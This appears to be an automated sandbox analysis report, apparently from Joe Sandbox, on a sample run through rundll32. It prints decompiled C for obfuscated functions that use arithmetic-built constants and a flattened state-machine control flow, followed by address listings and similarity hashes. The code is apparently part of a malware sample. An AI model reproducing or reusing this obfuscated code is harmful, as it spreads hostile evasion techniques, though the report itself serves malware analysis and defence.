                                                                                                                    				_v64 = _v64 >> 9;
                                                                                                                    				_v64 = _v64 ^ 0x000411a2;
                                                                                                                    				_v200 = 0xaa2240;
                                                                                                                    				_v200 = _v200 | 0x35f3f2d4;
                                                                                                                    				_v200 = _v200 + 0x4147;
                                                                                                                    				_v200 = _v200 + 0xffff1702;
                                                                                                                    				_v200 = _v200 ^ 0x35f16a60;
                                                                                                                    				_v52 = 0x980f89;
                                                                                                                    				_v52 = _v52 ^ 0xc15a5b47;
                                                                                                                    				_v52 = _v52 ^ 0xc1c323e9;
                                                                                                                    				_v216 = 0xb7a8b5;
                                                                                                                    				_v216 = _v216 >> 3;
                                                                                                                    				_v216 = _v216 ^ 0xa2f7ad91;
                                                                                                                    				_v216 = _v216 + 0xfffff0a8;
                                                                                                                    				_v216 = _v216 ^ 0xa2ec62b8;
                                                                                                                    				_v72 = 0x73581d;
                                                                                                                    				_v72 = _v72 + 0xffffc838;
                                                                                                                    				_v72 = _v72 ^ 0x00777119;
                                                                                                                    				_v164 = 0x873053;
                                                                                                                    				_v164 = _v164 ^ 0xefe323e3;
                                                                                                                    				_v164 = _v164 | 0xd91bba05;
                                                                                                                    				_v164 = _v164 ^ 0xff705bac;
                                                                                                                    				_v40 = 0xf8d5df;
                                                                                                                    				_v40 = _v40 ^ 0x79f853d7;
                                                                                                                    				_v40 = _v40 ^ 0x79053437;
                                                                                                                    				_v192 = 0x180af0;
                                                                                                                    				_v192 = _v192 + 0xffff4c14;
                                                                                                                    				_v192 = _v192 << 8;
                                                                                                                    				_v192 = _v192 + 0x2aad;
                                                                                                                    				_v192 = _v192 ^ 0x175759c3;
                                                                                                                    				_v256 = 0x23b549;
                                                                                                                    				_v256 = _v256 + 0x5eb6;
                                                                                                                    				_v256 = _v256 | 0xffb7bbff;
                                                                                                                    				_v256 = _v256 ^ 0xffb807e9;
                                                                                                                    				_v176 = 0xc1fdd5;
                                                                                                                    				_v176 = _v176 >> 0xc;
                                                                                                                    				_v176 = _v176 | 0x5151af8d;
                                                                                                                    				_v176 = _v176 ^ 0x515c7a4b;
                                                                                                                    				_v112 = 0xec5780;
                                                                                                                    				_v112 = _v112 ^ 0x97b4c021;
                                                                                                                    				_v112 = _v112 ^ 0x9750bd7e;
                                                                                                                    				_v180 = 0x591b41;
                                                                                                                    				_v180 = _v180 + 0x207e;
                                                                                                                    				_v180 = _v180 + 0xffffc81d;
                                                                                                                    				_v180 = _v180 ^ 0x005ca8dc;
                                                                                                                    				_v68 = 0x76fd1d;
                                                                                                                    				_t675 = 0x5c52c4a;
                                                                                                                    				_v68 = _v68 | 0x9e2d4356;
                                                                                                                    				_v68 = _v68 ^ 0x9e728261;
                                                                                                                    				_v76 = 0xf22a3;
                                                                                                                    				_v76 = _v76 | 0x9c703035;
                                                                                                                    				_v76 = _v76 ^ 0x9c7b5f20;
                                                                                                                    				_v220 = 0x3decab;
                                                                                                                    				_v220 = _v220 << 8;
                                                                                                                    				_v220 = _v220 ^ 0x53082a5e;
                                                                                                                    				_v220 = _v220 >> 0xd;
                                                                                                                    				_v220 = _v220 ^ 0x0004d715;
                                                                                                                    				_v84 = 0x6eb476;
                                                                                                                    				_v84 = _v84 << 0xd;
                                                                                                                    				_v84 = _v84 ^ 0xd68135de;
                                                                                                                    				_v124 = 0x458e11;
                                                                                                                    				_v124 = _v124 | 0x336f5b57;
                                                                                                                    				_t607 = 0x43;
                                                                                                                    				_v124 = _v124 / _t607;
                                                                                                                    				_v124 = _v124 ^ 0x00c97d17;
                                                                                                                    				_v156 = 0x7cba2c;
                                                                                                                    				_t608 = 0x4b;
                                                                                                                    				_v156 = _v156 / _t608;
                                                                                                                    				_v156 = _v156 | 0x0b494d21;
                                                                                                                    				_v156 = _v156 ^ 0x0b48f5d9;
                                                                                                                    				_v36 = 0x519404;
                                                                                                                    				_v36 = _v36 << 8;
                                                                                                                    				_v36 = _v36 ^ 0x5195ba3f;
                                                                                                                    				_v168 = 0xf13e55;
                                                                                                                    				_v168 = _v168 | 0x95edbe5f;
                                                                                                                    				_v168 = _v168 ^ 0xd6548190;
                                                                                                                    				_v168 = _v168 ^ 0x43a3dbfd;
                                                                                                                    				_v188 = 0xdd4a71;
                                                                                                                    				_v188 = _v188 + 0xffff5bb0;
                                                                                                                    				_v188 = _v188 >> 0xb;
                                                                                                                    				_v188 = _v188 >> 6;
                                                                                                                    				_v188 = _v188 ^ 0x000a03ec;
                                                                                                                    				_v196 = 0x58b29f;
                                                                                                                    				_t609 = 0x22;
                                                                                                                    				_v196 = _v196 / _t609;
                                                                                                                    				_v196 = _v196 + 0xffff713e;
                                                                                                                    				_v196 = _v196 + 0xffff146a;
                                                                                                                    				_v196 = _v196 ^ 0x000c9f67;
                                                                                                                    				_v212 = 0xc056c;
                                                                                                                    				_t610 = 0x45;
                                                                                                                    				_v212 = _v212 * 0x51;
                                                                                                                    				_v212 = _v212 >> 0xc;
                                                                                                                    				_v212 = _v212 / _t610;
                                                                                                                    				_v212 = _v212 ^ 0x0007774b;
                                                                                                                    				while(1) {
                                                                                                                    					L1:
                                                                                                                    					_t566 = 0x6c6f684;
                                                                                                                    					while(1) {
                                                                                                                    						L2:
                                                                                                                    						_t611 = 0x92c3a26;
                                                                                                                    						while(1) {
                                                                                                                    							L3:
                                                                                                                    							do {
                                                                                                                    								while(1) {
                                                                                                                    									L4:
                                                                                                                    									_t685 = _t596 - _t675;
                                                                                                                    									if(_t685 > 0) {
                                                                                                                    										break;
                                                                                                                    									}
                                                                                                                    									if(_t685 == 0) {
                                                                                                                    										E00346BC6(_v124, _v32, _v156);
                                                                                                                    										_t596 = 0x4bc1ff4;
                                                                                                                    										goto L1;
                                                                                                                    									} else {
                                                                                                                    										if(_t596 == 0x1d3710) {
                                                                                                                    											_t596 = 0x6d0da1a;
                                                                                                                    											continue;
                                                                                                                    										} else {
                                                                                                                    											if(_t596 == 0x19992af) {
                                                                                                                    												_push(_t611);
                                                                                                                    												_push(_t611);
                                                                                                                    												_t573 = E00337FF2(_v16);
                                                                                                                    												__eflags = _t573;
                                                                                                                    												_v20 = _t573;
                                                                                                                    												_t660 = 0x19c2787;
                                                                                                                    												_t596 =  !=  ? 0x19c2787 : 0x87f6c1b;
                                                                                                                    												_t566 = 0x6c6f684;
                                                                                                                    												_t611 = 0x92c3a26;
                                                                                                                    												continue;
                                                                                                                    											} else {
                                                                                                                    												if(_t596 == _t660) {
                                                                                                                    													_t575 = E00347B05(_v16,  &_v32, _v28, _v216, _v72, _v164, _v248, _v40, _v80, _t611, _v192, _v256, _v20);
                                                                                                                    													_t682 =  &(_t682[0xc]);
                                                                                                                    													__eflags = _t575 - _v240;
                                                                                                                    													_t611 = 0x92c3a26;
                                                                                                                    													_t566 = 0x6c6f684;
                                                                                                                    													_t596 =  ==  ? 0x92c3a26 : 0x4bc1ff4;
                                                                                                                    													goto L3;
                                                                                                                    												} else {
                                                                                                                    													if(_t596 == 0x489cb15) {
                                                                                                                    														_push(_v148);
                                                                                                                    														_push(_v44);
                                                                                                                    														_t577 = E0034DCF7(_v104, 0x3318b4, __eflags);
                                                                                                                    														_pop(_t633);
                                                                                                                    														__eflags = E00350B68(_t577,  &_v12, _v224, _v96, _t633,  &_v16, _v132, _v264, _v208, _v56, _v28, _v172) - _v116;
                                                                                                                    														_t596 =  ==  ? 0x19992af : 0x87f6c1b;
                                                                                                                    														E0033A8B0(_v48, _t577, _v88);
                                                                                                                    														_t677 = _v24;
                                                                                                                    														_t682 =  &(_t682[0xb]);
                                                                                                                    														L24:
                                                                                                                    														_t566 = 0x6c6f684;
                                                                                                                    														_t611 = 0x92c3a26;
                                                                                                                    														_t660 = 0x19c2787;
                                                                                                                    														goto L25;
                                                                                                                    													} else {
                                                                                                                    														if(_t596 != 0x4bc1ff4) {
                                                                                                                    															goto L25;
                                                                                                                    														} else {
                                                                                                                    															E00348519(_v36, _v168, _v20);
                                                                                                                    															_t596 = 0x87f6c1b;
                                                                                                                    															while(1) {
                                                                                                                    																L1:
                                                                                                                    																_t566 = 0x6c6f684;
                                                                                                                    																L2:
                                                                                                                    																_t611 = 0x92c3a26;
                                                                                                                    																L3:
                                                                                                                    																goto L4;
                                                                                                                    															}
                                                                                                                    														}
                                                                                                                    													}
                                                                                                                    												}
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    									L28:
                                                                                                                    									return _t680;
                                                                                                                    								}
                                                                                                                    								__eflags = _t596 - _t566;
                                                                                                                    								if(_t596 == _t566) {
                                                                                                                    									_t567 = E0034828A(_v68, _v76, _v220, _t677, _v120, 0x20, _v84, _v32);
                                                                                                                    									_t682 =  &(_t682[6]);
                                                                                                                    									_t596 = _t675;
                                                                                                                    									__eflags = _t567 - _v60;
                                                                                                                    									_t680 =  ==  ? 1 : _t680;
                                                                                                                    									goto L24;
                                                                                                                    								} else {
                                                                                                                    									__eflags = _t596 - 0x6d0da1a;
                                                                                                                    									if(__eflags == 0) {
                                                                                                                    										_push(_v272);
                                                                                                                    										_push(_v160);
                                                                                                                    										_t585 = E0034DCF7(_v268, 0x331884, __eflags);
                                                                                                                    										_push(_v152);
                                                                                                                    										_push(_v108);
                                                                                                                    										_t588 = E00339462(_t585, _v260,  &_v28, E0034DCF7(_v100, 0x331814, __eflags), _v92, _v144);
                                                                                                                    										_t682 =  &(_t682[9]);
                                                                                                                    										__eflags = _t588 - _v244;
                                                                                                                    										_t596 =  ==  ? 0x489cb15 : 0x822e036;
                                                                                                                    										E0033A8B0(_v228, _t585, _v236);
                                                                                                                    										E0033A8B0(_v128, _t586, _v136);
                                                                                                                    										_t677 = _v24;
                                                                                                                    										_t675 = 0x5c52c4a;
                                                                                                                    										goto L24;
                                                                                                                    									} else {
                                                                                                                    										__eflags = _t596 - 0x87f6c1b;
                                                                                                                    										if(_t596 == 0x87f6c1b) {
                                                                                                                    											E0033957D(_v28, _v188, _v196, _v204, _v212);
                                                                                                                    										} else {
                                                                                                                    											__eflags = _t596 - _t611;
                                                                                                                    											if(_t596 != _t611) {
                                                                                                                    												goto L25;
                                                                                                                    											} else {
                                                                                                                    												_t594 = E0033A81D(_v32, _a4, _v176, _v112, _v232, _a20, _v180);
                                                                                                                    												_t682 =  &(_t682[5]);
                                                                                                                    												__eflags = _t594 - _v184;
                                                                                                                    												_t566 = 0x6c6f684;
                                                                                                                    												_t596 =  ==  ? 0x6c6f684 : _t675;
                                                                                                                    												goto L2;
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    								goto L28;
                                                                                                                    								L25:
                                                                                                                    								__eflags = _t596 - 0x822e036;
                                                                                                                    							} while (__eflags != 0);
                                                                                                                    							goto L28;
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    			}

                                                                                                                    0x0034b4f6
                                                                                                                    0x0034b4fe
                                                                                                                    0x0034b506
                                                                                                                    0x0034b511
                                                                                                                    0x0034b51c
                                                                                                                    0x0034b527
                                                                                                                    0x0034b52f
                                                                                                                    0x0034b537
                                                                                                                    0x0034b53c
                                                                                                                    0x0034b544
                                                                                                                    0x0034b54c
                                                                                                                    0x0034b554
                                                                                                                    0x0034b55c
                                                                                                                    0x0034b564
                                                                                                                    0x0034b56c
                                                                                                                    0x0034b574
                                                                                                                    0x0034b579
                                                                                                                    0x0034b581
                                                                                                                    0x0034b589
                                                                                                                    0x0034b594
                                                                                                                    0x0034b59f
                                                                                                                    0x0034b5aa
                                                                                                                    0x0034b5b2
                                                                                                                    0x0034b5ba
                                                                                                                    0x0034b5c2
                                                                                                                    0x0034b5cc
                                                                                                                    0x0034b5d7
                                                                                                                    0x0034b5dc
                                                                                                                    0x0034b5e7
                                                                                                                    0x0034b5f2
                                                                                                                    0x0034b5fd
                                                                                                                    0x0034b608
                                                                                                                    0x0034b613
                                                                                                                    0x0034b61b
                                                                                                                    0x0034b620
                                                                                                                    0x0034b628
                                                                                                                    0x0034b62d
                                                                                                                    0x0034b635
                                                                                                                    0x0034b640
                                                                                                                    0x0034b648
                                                                                                                    0x0034b653
                                                                                                                    0x0034b65e
                                                                                                                    0x0034b672
                                                                                                                    0x0034b677
                                                                                                                    0x0034b680
                                                                                                                    0x0034b68b
                                                                                                                    0x0034b69d
                                                                                                                    0x0034b6a2
                                                                                                                    0x0034b6ab
                                                                                                                    0x0034b6b6
                                                                                                                    0x0034b6c1
                                                                                                                    0x0034b6cc
                                                                                                                    0x0034b6d4
                                                                                                                    0x0034b6df
                                                                                                                    0x0034b6e7
                                                                                                                    0x0034b6ef
                                                                                                                    0x0034b6f7
                                                                                                                    0x0034b6ff
                                                                                                                    0x0034b707
                                                                                                                    0x0034b70f
                                                                                                                    0x0034b714
                                                                                                                    0x0034b719
                                                                                                                    0x0034b721
                                                                                                                    0x0034b72d
                                                                                                                    0x0034b732
                                                                                                                    0x0034b738
                                                                                                                    0x0034b740
                                                                                                                    0x0034b748
                                                                                                                    0x0034b750
                                                                                                                    0x0034b75d
                                                                                                                    0x0034b75e
                                                                                                                    0x0034b762
                                                                                                                    0x0034b76d
                                                                                                                    0x0034b771
                                                                                                                    0x0034b779
                                                                                                                    0x0034b779
                                                                                                                    0x0034b779
                                                                                                                    0x0034b77e
                                                                                                                    0x0034b77e
                                                                                                                    0x0034b77e
                                                                                                                    0x0034b783
                                                                                                                    0x0034b783
                                                                                                                    0x0034b788
                                                                                                                    0x0034b788
                                                                                                                    0x0034b788
                                                                                                                    0x0034b788
                                                                                                                    0x0034b78a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0034b790
                                                                                                                    0x0034b969
                                                                                                                    0x0034b96f
                                                                                                                    0x00000000
                                                                                                                    0x0034b796
                                                                                                                    0x0034b79c
                                                                                                                    0x0034b94a
                                                                                                                    0x00000000
                                                                                                                    0x0034b7a2
                                                                                                                    0x0034b7a8
                                                                                                                    0x0034b91c
                                                                                                                    0x0034b91d
                                                                                                                    0x0034b91e
                                                                                                                    0x0034b924
                                                                                                                    0x0034b926
                                                                                                                    0x0034b933
                                                                                                                    0x0034b938
                                                                                                                    0x0034b93b
                                                                                                                    0x0034b940
                                                                                                                    0x00000000
                                                                                                                    0x0034b7ae
                                                                                                                    0x0034b7b0
                                                                                                                    0x0034b8dc
                                                                                                                    0x0034b8e3
                                                                                                                    0x0034b8ef
                                                                                                                    0x0034b8f1
                                                                                                                    0x0034b8f6
                                                                                                                    0x0034b8fb
                                                                                                                    0x00000000
                                                                                                                    0x0034b7b6
                                                                                                                    0x0034b7bc
                                                                                                                    0x0034b7e9
                                                                                                                    0x0034b7f5
                                                                                                                    0x0034b803
                                                                                                                    0x0034b809
                                                                                                                    0x0034b866
                                                                                                                    0x0034b874
                                                                                                                    0x0034b877
                                                                                                                    0x0034b87c
                                                                                                                    0x0034b883
                                                                                                                    0x0034bada
                                                                                                                    0x0034bada
                                                                                                                    0x0034badf
                                                                                                                    0x0034bae4
                                                                                                                    0x00000000
                                                                                                                    0x0034b7be
                                                                                                                    0x0034b7c4
                                                                                                                    0x00000000
                                                                                                                    0x0034b7ca
                                                                                                                    0x0034b7dc
                                                                                                                    0x0034b7e2
                                                                                                                    0x0034b779
                                                                                                                    0x0034b779
                                                                                                                    0x0034b779
                                                                                                                    0x0034b77e
                                                                                                                    0x0034b77e
                                                                                                                    0x0034b783
                                                                                                                    0x00000000
                                                                                                                    0x0034b783
                                                                                                                    0x0034b779
                                                                                                                    0x0034b7c4
                                                                                                                    0x0034b7bc
                                                                                                                    0x0034b7b0
                                                                                                                    0x0034b7a8
                                                                                                                    0x0034b79c
                                                                                                                    0x0034bb18
                                                                                                                    0x0034bb22
                                                                                                                    0x0034bb22
                                                                                                                    0x0034b979
                                                                                                                    0x0034b97b
                                                                                                                    0x0034babf
                                                                                                                    0x0034bad0
                                                                                                                    0x0034bad3
                                                                                                                    0x0034bad5
                                                                                                                    0x0034bad7
                                                                                                                    0x00000000
                                                                                                                    0x0034b981
                                                                                                                    0x0034b981
                                                                                                                    0x0034b987
                                                                                                                    0x0034b9e7
                                                                                                                    0x0034b9f0
                                                                                                                    0x0034b9fb
                                                                                                                    0x0034ba00
                                                                                                                    0x0034ba0e
                                                                                                                    0x0034ba44
                                                                                                                    0x0034ba4b
                                                                                                                    0x0034ba57
                                                                                                                    0x0034ba68
                                                                                                                    0x0034ba6b
                                                                                                                    0x0034ba81
                                                                                                                    0x0034ba86
                                                                                                                    0x0034ba8d
                                                                                                                    0x00000000
                                                                                                                    0x0034b989
                                                                                                                    0x0034b989
                                                                                                                    0x0034b98f
                                                                                                                    0x0034bb0e
                                                                                                                    0x0034b995
                                                                                                                    0x0034b995
                                                                                                                    0x0034b997
                                                                                                                    0x00000000
                                                                                                                    0x0034b99d
                                                                                                                    0x0034b9c8
                                                                                                                    0x0034b9cf
                                                                                                                    0x0034b9d8
                                                                                                                    0x0034b9da
                                                                                                                    0x0034b9df
                                                                                                                    0x00000000
                                                                                                                    0x0034b9df
                                                                                                                    0x0034b997
                                                                                                                    0x0034b98f
                                                                                                                    0x0034b987
                                                                                                                    0x00000000
                                                                                                                    0x0034bae9
                                                                                                                    0x0034bae9
                                                                                                                    0x0034bae9
                                                                                                                    0x00000000
                                                                                                                    0x0034baf5
                                                                                                                    0x0034b783
                                                                                                                    0x0034b77e

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: &:,$&:,$&:,$&:,$/i=$GA$Kz\Q$W[o3$_}+$gkv$v$(a$ve$~ $#$1P
                                                                                                                    • API String ID: 0-1587349264
                                                                                                                    • Opcode ID: 29c587ff5f3a93c98e0763e2aac28b0c4224748a18c74eb70dbfdaf19f5969b1
                                                                                                                    • Instruction ID: 764e977c853de021438b2ce95aced3390aa512e79c7019afbe67b07859b35cf7
                                                                                                                    • Opcode Fuzzy Hash: 29c587ff5f3a93c98e0763e2aac28b0c4224748a18c74eb70dbfdaf19f5969b1
                                                                                                                    • Instruction Fuzzy Hash: 445210711093809FD7B9CF61C48AB8BBBE1BBC4304F10891DE6DA9A261D7B19949CF53
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 88%
                                                                                                                    			E00345CC4() {
                                                                                                                    				char _v520;
                                                                                                                    				char _v1040;
                                                                                                                    				char _v1560;
                                                                                                                    				void* _v1572;
                                                                                                                    				intOrPtr _v1576;
                                                                                                                    				signed int _v1580;
                                                                                                                    				signed int _v1584;
                                                                                                                    				signed int _v1588;
                                                                                                                    				signed int _v1592;
                                                                                                                    				signed int _v1596;
                                                                                                                    				signed int _v1600;
                                                                                                                    				signed int _v1604;
                                                                                                                    				signed int _v1608;
                                                                                                                    				signed int _v1612;
                                                                                                                    				signed int _v1616;
                                                                                                                    				signed int _v1620;
                                                                                                                    				signed int _v1624;
                                                                                                                    				signed int _v1628;
                                                                                                                    				signed int _v1632;
                                                                                                                    				signed int _v1636;
                                                                                                                    				signed int _v1640;
                                                                                                                    				signed int _v1644;
                                                                                                                    				signed int _v1648;
                                                                                                                    				signed int _v1652;
                                                                                                                    				signed int _v1656;
                                                                                                                    				signed int _v1660;
                                                                                                                    				signed int _v1664;
                                                                                                                    				signed int _v1668;
                                                                                                                    				signed int _v1672;
                                                                                                                    				signed int _v1676;
                                                                                                                    				signed int _v1680;
                                                                                                                    				signed int _v1684;
                                                                                                                    				signed int _v1688;
                                                                                                                    				signed int _v1692;
                                                                                                                    				signed int _v1696;
                                                                                                                    				signed int _v1700;
                                                                                                                    				signed int _v1704;
                                                                                                                    				signed int _v1708;
                                                                                                                    				signed int _v1712;
                                                                                                                    				signed int _v1716;
                                                                                                                    				signed int _v1720;
                                                                                                                    				signed int _v1724;
                                                                                                                    				signed int _v1728;
                                                                                                                    				signed int _v1732;
                                                                                                                    				signed int _v1736;
                                                                                                                    				signed int _v1740;
                                                                                                                    				signed int _v1744;
                                                                                                                    				signed int _v1748;
                                                                                                                    				signed int _v1752;
                                                                                                                    				signed int _v1756;
                                                                                                                    				signed int _v1760;
                                                                                                                    				signed int _v1764;
                                                                                                                    				void* _t481;
                                                                                                                    				signed int _t496;
                                                                                                                    				void* _t499;
                                                                                                                    				intOrPtr _t503;
                                                                                                                    				void* _t539;
                                                                                                                    				signed int _t550;
                                                                                                                    				signed int _t551;
                                                                                                                    				signed int _t552;
                                                                                                                    				intOrPtr _t553;
                                                                                                                    				intOrPtr* _t554;
                                                                                                                    				signed int _t555;
                                                                                                                    				signed int _t556;
                                                                                                                    				signed int _t557;
                                                                                                                    				signed int _t558;
                                                                                                                    				signed int _t559;
                                                                                                                    				signed int _t560;
                                                                                                                    				signed int _t561;
                                                                                                                    				signed int _t562;
                                                                                                                    				signed int _t563;
                                                                                                                    				signed int _t564;
                                                                                                                    				signed int _t567;
                                                                                                                    				signed int* _t568;
                                                                                                                    				void* _t572;
                                                                                                                    
                                                                                                                    				_t568 =  &_v1764;
                                                                                                                    				_v1576 = 0x9a4c1d;
                                                                                                                    				_v1596 = _v1596 & 0x00000000;
                                                                                                                    				asm("stosd");
                                                                                                                    				_t499 = 0x9b91574;
                                                                                                                    				asm("stosd");
                                                                                                                    				asm("stosd");
                                                                                                                    				_v1684 = 0xe59dc4;
                                                                                                                    				_v1684 = _v1684 | 0xd0a48cbc;
                                                                                                                    				_v1684 = _v1684 + 0xffff2e59;
                                                                                                                    				_v1684 = _v1684 ^ 0xd0e4cc7c;
                                                                                                                    				_v1752 = 0x51b4b3;
                                                                                                                    				_v1752 = _v1752 ^ 0x5d9a17a0;
                                                                                                                    				_t550 = 0xb;
                                                                                                                    				_t555 = 0x76;
                                                                                                                    				_v1752 = _v1752 * 0xb;
                                                                                                                    				_v1752 = _v1752 ^ 0x54bb96eb;
                                                                                                                    				_v1752 = _v1752 ^ 0x53749705;
                                                                                                                    				_v1632 = 0xaf6c30;
                                                                                                                    				_v1632 = _v1632 << 6;
                                                                                                                    				_v1632 = _v1632 ^ 0x2bdb0c02;
                                                                                                                    				_v1720 = 0x499d0c;
                                                                                                                    				_v1720 = _v1720 | 0xb1a117f5;
                                                                                                                    				_v1720 = _v1720 / _t550;
                                                                                                                    				_v1720 = _v1720 + 0x97c7;
                                                                                                                    				_v1720 = _v1720 ^ 0x102d1aad;
                                                                                                                    				_v1704 = 0xc8e3b3;
                                                                                                                    				_v1704 = _v1704 * 0x32;
                                                                                                                    				_v1704 = _v1704 ^ 0x0819b8db;
                                                                                                                    				_v1704 = _v1704 | 0x44ca091a;
                                                                                                                    				_v1704 = _v1704 ^ 0x6fefc93f;
                                                                                                                    				_v1668 = 0xa62014;
                                                                                                                    				_v1668 = _v1668 | 0xeabb5dd4;
                                                                                                                    				_v1668 = _v1668 * 0x68;
                                                                                                                    				_v1668 = _v1668 ^ 0x5dcb1e30;
                                                                                                                    				_v1744 = 0xf6f234;
                                                                                                                    				_v1744 = _v1744 * 0x2a;
                                                                                                                    				_v1744 = _v1744 ^ 0x80b741fb;
                                                                                                                    				_v1744 = _v1744 / _t555;
                                                                                                                    				_v1744 = _v1744 ^ 0x0165dd5f;
                                                                                                                    				_v1584 = 0x312e96;
                                                                                                                    				_v1584 = _v1584 + 0xffff2d5f;
                                                                                                                    				_v1584 = _v1584 ^ 0x003c0d9d;
                                                                                                                    				_v1712 = 0xa058cf;
                                                                                                                    				_v1712 = _v1712 << 0xd;
                                                                                                                    				_v1712 = _v1712 >> 8;
                                                                                                                    				_t556 = 0x70;
                                                                                                                    				_v1712 = _v1712 / _t556;
                                                                                                                    				_v1712 = _v1712 ^ 0x000e60b1;
                                                                                                                    				_v1624 = 0xe892f9;
                                                                                                                    				_v1624 = _v1624 | 0x8c579b60;
                                                                                                                    				_v1624 = _v1624 ^ 0x8cfff2b4;
                                                                                                                    				_v1616 = 0xaf548d;
                                                                                                                    				_v1616 = _v1616 << 0xe;
                                                                                                                    				_v1616 = _v1616 ^ 0xd52eab36;
                                                                                                                    				_v1732 = 0xb05ea2;
                                                                                                                    				_v1732 = _v1732 * 0x22;
                                                                                                                    				_t557 = 0x7e;
                                                                                                                    				_v1732 = _v1732 / _t557;
                                                                                                                    				_t558 = 0x6e;
                                                                                                                    				_v1732 = _v1732 / _t558;
                                                                                                                    				_v1732 = _v1732 ^ 0x000d3439;
                                                                                                                    				_v1592 = 0x913a71;
                                                                                                                    				_v1592 = _v1592 + 0xffff7440;
                                                                                                                    				_v1592 = _v1592 ^ 0x0095b07c;
                                                                                                                    				_v1696 = 0x599322;
                                                                                                                    				_v1696 = _v1696 / _t550;
                                                                                                                    				_v1696 = _v1696 ^ 0xb13d8f34;
                                                                                                                    				_v1696 = _v1696 ^ 0xb1384542;
                                                                                                                    				_v1644 = 0xa16dfa;
                                                                                                                    				_v1644 = _v1644 ^ 0xe1099bcb;
                                                                                                                    				_v1644 = _v1644 ^ 0xe1a9d34e;
                                                                                                                    				_v1648 = 0xb4e11f;
                                                                                                                    				_v1648 = _v1648 ^ 0x38d2ca48;
                                                                                                                    				_v1648 = _v1648 ^ 0x386e0f93;
                                                                                                                    				_v1608 = 0x5a22b;
                                                                                                                    				_t559 = 0x77;
                                                                                                                    				_t551 = 0x6a;
                                                                                                                    				_v1608 = _v1608 * 0x7a;
                                                                                                                    				_v1608 = _v1608 ^ 0x02a61538;
                                                                                                                    				_v1680 = 0xefbd86;
                                                                                                                    				_v1680 = _v1680 ^ 0x59656a46;
                                                                                                                    				_v1680 = _v1680 + 0xffff500f;
                                                                                                                    				_v1680 = _v1680 ^ 0x598ded80;
                                                                                                                    				_v1724 = 0x3ee43e;
                                                                                                                    				_v1724 = _v1724 + 0x7543;
                                                                                                                    				_v1724 = _v1724 ^ 0x2e29824a;
                                                                                                                    				_v1724 = _v1724 + 0xffff57f4;
                                                                                                                    				_v1724 = _v1724 ^ 0x2e1fc8aa;
                                                                                                                    				_v1580 = 0xa6d208;
                                                                                                                    				_v1580 = _v1580 | 0x568c9bfe;
                                                                                                                    				_v1580 = _v1580 ^ 0x56ae214d;
                                                                                                                    				_v1636 = 0x6d5924;
                                                                                                                    				_v1636 = _v1636 ^ 0x925c239d;
                                                                                                                    				_v1636 = _v1636 ^ 0x923215a4;
                                                                                                                    				_v1664 = 0x695adc;
                                                                                                                    				_v1664 = _v1664 / _t559;
                                                                                                                    				_v1664 = _v1664 + 0x9e91;
                                                                                                                    				_v1664 = _v1664 ^ 0x000b7b12;
                                                                                                                    				_v1728 = 0x27fcd;
                                                                                                                    				_v1728 = _v1728 << 7;
                                                                                                                    				_v1728 = _v1728 >> 0xd;
                                                                                                                    				_v1728 = _v1728 / _t551;
                                                                                                                    				_v1728 = _v1728 ^ 0x000e8750;
                                                                                                                    				_v1660 = 0x324e38;
                                                                                                                    				_t560 = 0xd;
                                                                                                                    				_v1660 = _v1660 / _t560;
                                                                                                                    				_v1660 = _v1660 ^ 0xc6795c1b;
                                                                                                                    				_v1660 = _v1660 ^ 0xc67cbc2f;
                                                                                                                    				_v1672 = 0xd5264d;
                                                                                                                    				_v1672 = _v1672 ^ 0x5df7965f;
                                                                                                                    				_v1672 = _v1672 << 0xa;
                                                                                                                    				_v1672 = _v1672 ^ 0x8ac02156;
                                                                                                                    				_v1760 = 0x48e2ee;
                                                                                                                    				_t213 =  &_v1760; // 0x48e2ee
                                                                                                                    				_t561 = 0x2d;
                                                                                                                    				_v1760 =  *_t213 / _t561;
                                                                                                                    				_v1760 = _v1760 ^ 0xd2c1db30;
                                                                                                                    				_v1760 = _v1760 ^ 0xa53e2936;
                                                                                                                    				_v1760 = _v1760 ^ 0x77fe21cd;
                                                                                                                    				_v1740 = 0xf20c88;
                                                                                                                    				_v1740 = _v1740 / _t551;
                                                                                                                    				_v1740 = _v1740 | 0xd96c60ad;
                                                                                                                    				_v1740 = _v1740 << 0xc;
                                                                                                                    				_v1740 = _v1740 ^ 0xe68a7191;
                                                                                                                    				_v1588 = 0x8e0aab;
                                                                                                                    				_t562 = 0x1b;
                                                                                                                    				_v1588 = _v1588 * 0x60;
                                                                                                                    				_v1588 = _v1588 ^ 0x354c6054;
                                                                                                                    				_v1748 = 0x4e8d34;
                                                                                                                    				_v1748 = _v1748 + 0x9e68;
                                                                                                                    				_v1748 = _v1748 ^ 0xb589d4ed;
                                                                                                                    				_v1748 = _v1748 ^ 0xb12a6144;
                                                                                                                    				_v1748 = _v1748 ^ 0x04e7453a;
                                                                                                                    				_v1756 = 0x3003da;
                                                                                                                    				_v1756 = _v1756 << 2;
                                                                                                                    				_v1756 = _v1756 + 0x3550;
                                                                                                                    				_v1756 = _v1756 + 0xffff4840;
                                                                                                                    				_v1756 = _v1756 ^ 0x00bf12fa;
                                                                                                                    				_v1764 = 0x8da8e8;
                                                                                                                    				_v1764 = _v1764 * 0x70;
                                                                                                                    				_v1764 = _v1764 | 0x3d3a45ac;
                                                                                                                    				_v1764 = _v1764 + 0xffff8f06;
                                                                                                                    				_v1764 = _v1764 ^ 0x3dfaa955;
                                                                                                                    				_v1600 = 0x16815c;
                                                                                                                    				_v1600 = _v1600 | 0x74adb72e;
                                                                                                                    				_v1600 = _v1600 ^ 0x74bac2ad;
                                                                                                                    				_v1736 = 0x173f97;
